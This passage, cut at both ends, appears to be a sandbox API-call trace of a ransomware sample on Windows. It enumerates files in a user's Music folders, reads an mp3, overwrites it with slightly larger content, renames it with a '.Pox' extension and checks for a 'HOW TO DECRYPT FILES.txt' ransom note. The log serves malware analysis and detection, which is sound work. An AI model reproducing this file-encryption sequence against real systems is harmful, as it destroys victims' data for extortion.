ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0040.941] FindClose (in: hFindFile=0x406088 | out: hFindFile=0x406088) returned 1 [0040.941] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae5d8) returned 1 [0040.942] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae5e4) returned 1 [0040.942] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae5a4) returned 1 [0040.942] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FBbg9d", nBufferLength=0x105, lpBuffer=0x3ae0ac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FBbg9d", lpFilePart=0x0) returned 0x2a [0040.942] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FBbg9d\\", nBufferLength=0x105, lpBuffer=0x3ae080, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FBbg9d\\", lpFilePart=0x0) returned 0x2b [0040.942] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FBbg9d\\*", lpFindFileData=0x3ae2cc | out: lpFindFileData=0x3ae2cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa798b360, ftCreationTime.dwHighDateTime=0x1d4d2d0, ftLastAccessTime.dwLowDateTime=0xa7fe1a00, ftLastAccessTime.dwHighDateTime=0x1d4c69d, ftLastWriteTime.dwLowDateTime=0xa7fe1a00, ftLastWriteTime.dwHighDateTime=0x1d4c69d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x406088 [0040.942] FindNextFileW (in: hFindFile=0x406088, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa798b360, ftCreationTime.dwHighDateTime=0x1d4d2d0, ftLastAccessTime.dwLowDateTime=0xa7fe1a00, ftLastAccessTime.dwHighDateTime=0x1d4c69d, ftLastWriteTime.dwLowDateTime=0xa7fe1a00, ftLastWriteTime.dwHighDateTime=0x1d4c69d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.942] FindNextFileW (in: hFindFile=0x406088, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa943b480, ftCreationTime.dwHighDateTime=0x1d4c7bd, ftLastAccessTime.dwLowDateTime=0xb1a09e60, ftLastAccessTime.dwHighDateTime=0x1d4d53a, ftLastWriteTime.dwLowDateTime=0xb1a09e60, ftLastWriteTime.dwHighDateTime=0x1d4d53a, nFileSizeHigh=0x0, nFileSizeLow=0x1611b, dwReserved0=0x0, dwReserved1=0x0, cFileName="35jJdI4i.m4a", cAlternateFileName="")) returned 1 [0040.942] FindNextFileW (in: hFindFile=0x406088, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa26d0480, ftCreationTime.dwHighDateTime=0x1d4ced0, ftLastAccessTime.dwLowDateTime=0x4e84a1d0, ftLastAccessTime.dwHighDateTime=0x1d4cff1, ftLastWriteTime.dwLowDateTime=0x4e84a1d0, ftLastWriteTime.dwHighDateTime=0x1d4cff1, nFileSizeHigh=0x0, nFileSizeLow=0x8cfa, dwReserved0=0x0, dwReserved1=0x0, cFileName="nAVhpGDvt1xmZKi.wav", cAlternateFileName="NAVHPG~1.WAV")) returned 1 [0040.942] FindNextFileW (in: hFindFile=0x406088, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9d1f2770, ftCreationTime.dwHighDateTime=0x1d4d46f, ftLastAccessTime.dwLowDateTime=0x9c586d80, ftLastAccessTime.dwHighDateTime=0x1d4cfb8, ftLastWriteTime.dwLowDateTime=0x9c586d80, ftLastWriteTime.dwHighDateTime=0x1d4cfb8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PKOld", cAlternateFileName="")) returned 1 [0040.942] FindNextFileW (in: hFindFile=0x406088, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9d1f2770, ftCreationTime.dwHighDateTime=0x1d4d46f, ftLastAccessTime.dwLowDateTime=0x9c586d80, ftLastAccessTime.dwHighDateTime=0x1d4cfb8, ftLastWriteTime.dwLowDateTime=0x9c586d80, ftLastWriteTime.dwHighDateTime=0x1d4cfb8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PKOld", cAlternateFileName="")) returned 0 [0040.943] FindClose (in: hFindFile=0x406088 | out: hFindFile=0x406088) returned 1 [0040.943] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae564) returned 1 [0040.943] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae570) returned 1 [0040.943] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae5a4) returned 1 [0040.943] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FBbg9d", nBufferLength=0x105, lpBuffer=0x3ae0ac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FBbg9d", lpFilePart=0x0) returned 0x2a [0040.943] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FBbg9d\\", nBufferLength=0x105, lpBuffer=0x3ae080, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FBbg9d\\", lpFilePart=0x0) returned 0x2b [0040.943] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FBbg9d\\*", lpFindFileData=0x3ae2cc | out: lpFindFileData=0x3ae2cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa798b360, ftCreationTime.dwHighDateTime=0x1d4d2d0, ftLastAccessTime.dwLowDateTime=0xa7fe1a00, ftLastAccessTime.dwHighDateTime=0x1d4c69d, ftLastWriteTime.dwLowDateTime=0xa7fe1a00, ftLastWriteTime.dwHighDateTime=0x1d4c69d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x406088 [0040.943] FindNextFileW (in: hFindFile=0x406088, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa798b360, ftCreationTime.dwHighDateTime=0x1d4d2d0, ftLastAccessTime.dwLowDateTime=0xa7fe1a00, ftLastAccessTime.dwHighDateTime=0x1d4c69d, ftLastWriteTime.dwLowDateTime=0xa7fe1a00, ftLastWriteTime.dwHighDateTime=0x1d4c69d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.943] FindNextFileW (in: hFindFile=0x406088, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa943b480, ftCreationTime.dwHighDateTime=0x1d4c7bd, ftLastAccessTime.dwLowDateTime=0xb1a09e60, ftLastAccessTime.dwHighDateTime=0x1d4d53a, ftLastWriteTime.dwLowDateTime=0xb1a09e60, ftLastWriteTime.dwHighDateTime=0x1d4d53a, nFileSizeHigh=0x0, nFileSizeLow=0x1611b, dwReserved0=0x0, dwReserved1=0x0, cFileName="35jJdI4i.m4a", cAlternateFileName="")) returned 1 [0040.943] FindNextFileW (in: hFindFile=0x406088, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa26d0480, ftCreationTime.dwHighDateTime=0x1d4ced0, ftLastAccessTime.dwLowDateTime=0x4e84a1d0, ftLastAccessTime.dwHighDateTime=0x1d4cff1, ftLastWriteTime.dwLowDateTime=0x4e84a1d0, ftLastWriteTime.dwHighDateTime=0x1d4cff1, nFileSizeHigh=0x0, nFileSizeLow=0x8cfa, dwReserved0=0x0, dwReserved1=0x0, cFileName="nAVhpGDvt1xmZKi.wav", cAlternateFileName="NAVHPG~1.WAV")) returned 1 [0040.944] FindNextFileW (in: hFindFile=0x406088, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9d1f2770, ftCreationTime.dwHighDateTime=0x1d4d46f, ftLastAccessTime.dwLowDateTime=0x9c586d80, ftLastAccessTime.dwHighDateTime=0x1d4cfb8, ftLastWriteTime.dwLowDateTime=0x9c586d80, ftLastWriteTime.dwHighDateTime=0x1d4cfb8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PKOld", cAlternateFileName="")) returned 1 [0040.944] FindNextFileW (in: hFindFile=0x406088, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0040.944] FindClose (in: hFindFile=0x406088 | out: hFindFile=0x406088) returned 1 [0040.944] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae564) returned 1 [0040.944] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae570) returned 1 [0040.944] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae530) returned 1 [0040.944] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FBbg9d\\PKOld", nBufferLength=0x105, lpBuffer=0x3ae038, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FBbg9d\\PKOld", lpFilePart=0x0) returned 0x30 [0040.944] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FBbg9d\\PKOld\\", nBufferLength=0x105, lpBuffer=0x3ae00c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FBbg9d\\PKOld\\", lpFilePart=0x0) returned 0x31 [0040.944] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FBbg9d\\PKOld\\*", lpFindFileData=0x3ae258 | out: lpFindFileData=0x3ae258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9d1f2770, ftCreationTime.dwHighDateTime=0x1d4d46f, ftLastAccessTime.dwLowDateTime=0x9c586d80, ftLastAccessTime.dwHighDateTime=0x1d4cfb8, ftLastWriteTime.dwLowDateTime=0x9c586d80, ftLastWriteTime.dwHighDateTime=0x1d4cfb8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x406088 [0040.944] FindNextFileW (in: hFindFile=0x406088, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9d1f2770, ftCreationTime.dwHighDateTime=0x1d4d46f, ftLastAccessTime.dwLowDateTime=0x9c586d80, ftLastAccessTime.dwHighDateTime=0x1d4cfb8, ftLastWriteTime.dwLowDateTime=0x9c586d80, ftLastWriteTime.dwHighDateTime=0x1d4cfb8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.944] FindNextFileW (in: hFindFile=0x406088, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84a5a770, ftCreationTime.dwHighDateTime=0x1d4c563, ftLastAccessTime.dwLowDateTime=0x5032cd80, ftLastAccessTime.dwHighDateTime=0x1d4c98f, ftLastWriteTime.dwLowDateTime=0x5032cd80, ftLastWriteTime.dwHighDateTime=0x1d4c98f, nFileSizeHigh=0x0, nFileSizeLow=0x145b2, dwReserved0=0x0, dwReserved1=0x0, cFileName="FV9PrG5bi5O _o.wav", cAlternateFileName="FV9PRG~1.WAV")) returned 1 [0040.945] FindNextFileW (in: hFindFile=0x406088, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6feb3980, ftCreationTime.dwHighDateTime=0x1d4d4db, ftLastAccessTime.dwLowDateTime=0xb43a19a0, ftLastAccessTime.dwHighDateTime=0x1d4cc55, ftLastWriteTime.dwLowDateTime=0xb43a19a0, ftLastWriteTime.dwHighDateTime=0x1d4cc55, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RnCSi3k1J", cAlternateFileName="RNCSI3~1")) returned 1 [0040.945] FindNextFileW (in: hFindFile=0x406088, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2dd531a0, ftCreationTime.dwHighDateTime=0x1d4d309, ftLastAccessTime.dwLowDateTime=0x90b887e0, ftLastAccessTime.dwHighDateTime=0x1d4d084, ftLastWriteTime.dwLowDateTime=0x90b887e0, ftLastWriteTime.dwHighDateTime=0x1d4d084, nFileSizeHigh=0x0, nFileSizeLow=0xe2c2, dwReserved0=0x0, dwReserved1=0x0, cFileName="ruQw.wav", cAlternateFileName="")) returned 1 [0040.945] FindNextFileW (in: hFindFile=0x406088, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x97352ed0, ftCreationTime.dwHighDateTime=0x1d4cbd3, ftLastAccessTime.dwLowDateTime=0xaca0bc30, ftLastAccessTime.dwHighDateTime=0x1d4d434, ftLastWriteTime.dwLowDateTime=0xaca0bc30, ftLastWriteTime.dwHighDateTime=0x1d4d434, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="yGHv", cAlternateFileName="")) returned 1 [0040.945] FindNextFileW (in: hFindFile=0x406088, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xedaf33a0, ftCreationTime.dwHighDateTime=0x1d4d54c, ftLastAccessTime.dwLowDateTime=0x2eb1a900, ftLastAccessTime.dwHighDateTime=0x1d4c652, ftLastWriteTime.dwLowDateTime=0x2eb1a900, ftLastWriteTime.dwHighDateTime=0x1d4c652, nFileSizeHigh=0x0, nFileSizeLow=0xc217, dwReserved0=0x0, dwReserved1=0x0, cFileName="YR5fG.mp3", cAlternateFileName="")) returned 1 [0040.945] FindNextFileW (in: hFindFile=0x406088, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0040.945] FindClose (in: hFindFile=0x406088 | out: hFindFile=0x406088) returned 1 [0040.945] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4f0) returned 1 [0040.945] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4fc) returned 1 [0040.945] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae530) returned 1 [0040.945] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FBbg9d\\PKOld", nBufferLength=0x105, lpBuffer=0x3ae038, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FBbg9d\\PKOld", lpFilePart=0x0) returned 0x30 [0040.945] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FBbg9d\\PKOld\\", nBufferLength=0x105, lpBuffer=0x3ae00c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FBbg9d\\PKOld\\", lpFilePart=0x0) returned 0x31 [0040.946] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FBbg9d\\PKOld\\*", lpFindFileData=0x3ae258 | out: lpFindFileData=0x3ae258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9d1f2770, ftCreationTime.dwHighDateTime=0x1d4d46f, ftLastAccessTime.dwLowDateTime=0x9c586d80, ftLastAccessTime.dwHighDateTime=0x1d4cfb8, ftLastWriteTime.dwLowDateTime=0x9c586d80, ftLastWriteTime.dwHighDateTime=0x1d4cfb8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x406088 [0040.946] FindNextFileW (in: hFindFile=0x406088, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9d1f2770, ftCreationTime.dwHighDateTime=0x1d4d46f, ftLastAccessTime.dwLowDateTime=0x9c586d80, ftLastAccessTime.dwHighDateTime=0x1d4cfb8, ftLastWriteTime.dwLowDateTime=0x9c586d80, ftLastWriteTime.dwHighDateTime=0x1d4cfb8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.946] FindNextFileW (in: hFindFile=0x406088, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84a5a770, ftCreationTime.dwHighDateTime=0x1d4c563, ftLastAccessTime.dwLowDateTime=0x5032cd80, ftLastAccessTime.dwHighDateTime=0x1d4c98f, ftLastWriteTime.dwLowDateTime=0x5032cd80, ftLastWriteTime.dwHighDateTime=0x1d4c98f, nFileSizeHigh=0x0, nFileSizeLow=0x145b2, dwReserved0=0x0, dwReserved1=0x0, cFileName="FV9PrG5bi5O _o.wav", cAlternateFileName="FV9PRG~1.WAV")) returned 1 [0040.946] FindNextFileW (in: hFindFile=0x406088, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6feb3980, ftCreationTime.dwHighDateTime=0x1d4d4db, ftLastAccessTime.dwLowDateTime=0xb43a19a0, ftLastAccessTime.dwHighDateTime=0x1d4cc55, ftLastWriteTime.dwLowDateTime=0xb43a19a0, ftLastWriteTime.dwHighDateTime=0x1d4cc55, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RnCSi3k1J", cAlternateFileName="RNCSI3~1")) returned 1 [0040.946] FindNextFileW (in: hFindFile=0x406088, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2dd531a0, ftCreationTime.dwHighDateTime=0x1d4d309, ftLastAccessTime.dwLowDateTime=0x90b887e0, ftLastAccessTime.dwHighDateTime=0x1d4d084, ftLastWriteTime.dwLowDateTime=0x90b887e0, ftLastWriteTime.dwHighDateTime=0x1d4d084, nFileSizeHigh=0x0, nFileSizeLow=0xe2c2, dwReserved0=0x0, dwReserved1=0x0, cFileName="ruQw.wav", cAlternateFileName="")) returned 1 [0040.946] FindNextFileW (in: hFindFile=0x406088, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x97352ed0, ftCreationTime.dwHighDateTime=0x1d4cbd3, ftLastAccessTime.dwLowDateTime=0xaca0bc30, ftLastAccessTime.dwHighDateTime=0x1d4d434, ftLastWriteTime.dwLowDateTime=0xaca0bc30, ftLastWriteTime.dwHighDateTime=0x1d4d434, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="yGHv", cAlternateFileName="")) returned 1 [0040.946] FindNextFileW (in: hFindFile=0x406088, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xedaf33a0, ftCreationTime.dwHighDateTime=0x1d4d54c, ftLastAccessTime.dwLowDateTime=0x2eb1a900, ftLastAccessTime.dwHighDateTime=0x1d4c652, ftLastWriteTime.dwLowDateTime=0x2eb1a900, ftLastWriteTime.dwHighDateTime=0x1d4c652, nFileSizeHigh=0x0, nFileSizeLow=0xc217, dwReserved0=0x0, dwReserved1=0x0, cFileName="YR5fG.mp3", cAlternateFileName="")) returned 1 [0040.947] FindNextFileW (in: hFindFile=0x406088, lpFindFileData=0x3ae268 | out: lpFindFileData=0x3ae268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xedaf33a0, ftCreationTime.dwHighDateTime=0x1d4d54c, ftLastAccessTime.dwLowDateTime=0x2eb1a900, ftLastAccessTime.dwHighDateTime=0x1d4c652, ftLastWriteTime.dwLowDateTime=0x2eb1a900, ftLastWriteTime.dwHighDateTime=0x1d4c652, nFileSizeHigh=0x0, nFileSizeLow=0xc217, dwReserved0=0x0, dwReserved1=0x0, cFileName="YR5fG.mp3", cAlternateFileName="")) returned 0 [0040.947] FindClose (in: hFindFile=0x406088 | out: hFindFile=0x406088) returned 1 [0040.947] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4f0) returned 1 [0040.947] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4fc) returned 1 [0040.947] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FBbg9d\\PKOld\\YR5fG.mp3", nBufferLength=0x105, lpBuffer=0x3adee0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FBbg9d\\PKOld\\YR5fG.mp3", lpFilePart=0x0) returned 0x3a [0040.947] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae3d4) returned 1 [0040.947] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FBbg9d\\PKOld\\YR5fG.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\fbbg9d\\pkold\\yr5fg.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0040.947] GetFileType (hFile=0x26c) returned 0x1 [0040.947] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae3d0) returned 1 [0040.947] GetFileType (hFile=0x26c) returned 0x1 [0040.947] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae4dc | out: lpFileSizeHigh=0x3ae4dc*=0x0) returned 0xc217 [0040.947] ReadFile (in: hFile=0x26c, lpBuffer=0x24dac04, nNumberOfBytesToRead=0xc217, lpNumberOfBytesRead=0x3ae488, lpOverlapped=0x0 | out: lpBuffer=0x24dac04*, lpNumberOfBytesRead=0x3ae488*=0xc217, lpOverlapped=0x0) returned 1 [0040.963] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3adff4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0040.963] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae454) returned 1 [0040.963] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae4d0 | out: lpFileInformation=0x3ae4d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0040.963] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae450) returned 1 [0040.964] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FBbg9d\\PKOld\\YR5fG.mp3", nBufferLength=0x105, lpBuffer=0x3adecc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FBbg9d\\PKOld\\YR5fG.mp3", lpFilePart=0x0) returned 0x3a [0040.964] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae3c0) returned 1 [0040.964] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FBbg9d\\PKOld\\YR5fG.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\fbbg9d\\pkold\\yr5fg.mp3"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0040.965] GetFileType (hFile=0x26c) returned 0x1 [0040.965] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae3bc) returned 1 [0040.965] GetFileType (hFile=0x26c) returned 0x1 [0040.965] WriteFile (in: hFile=0x26c, lpBuffer=0x254c064*, nNumberOfBytesToWrite=0xc220, lpNumberOfBytesWritten=0x3ae47c, lpOverlapped=0x0 | out: lpBuffer=0x254c064*, lpNumberOfBytesWritten=0x3ae47c*=0xc220, lpOverlapped=0x0) returned 1 [0040.967] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FBbg9d\\PKOld\\YR5fG.mp3", nBufferLength=0x105, lpBuffer=0x3ae000, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FBbg9d\\PKOld\\YR5fG.mp3", lpFilePart=0x0) returned 0x3a [0040.967] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FBbg9d\\PKOld\\YR5fG.mp3.Pox", nBufferLength=0x105, lpBuffer=0x3ae000, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FBbg9d\\PKOld\\YR5fG.mp3.Pox", lpFilePart=0x0) returned 0x3e [0040.967] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae460) returned 1 [0040.967] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FBbg9d\\PKOld\\YR5fG.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\fbbg9d\\pkold\\yr5fg.mp3"), fInfoLevelId=0x0, lpFileInformation=0x3ae4dc | out: lpFileInformation=0x3ae4dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xedaf33a0, ftCreationTime.dwHighDateTime=0x1d4d54c, ftLastAccessTime.dwLowDateTime=0x2eb1a900, ftLastAccessTime.dwHighDateTime=0x1d4c652, ftLastWriteTime.dwLowDateTime=0x2a992aa0, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0xc220)) returned 1 [0040.967] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae45c) returned 1 [0040.967] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FBbg9d\\PKOld\\YR5fG.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\fbbg9d\\pkold\\yr5fg.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FBbg9d\\PKOld\\YR5fG.mp3.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\fbbg9d\\pkold\\yr5fg.mp3.pox")) returned 1 [0040.968] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4bc) returned 1 [0040.968] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\FBbg9d\\PKOld\\RnCSi3k1J", nBufferLength=0x105, lpBuffer=0x3adfc4, lpFilePart=0x0 | out: 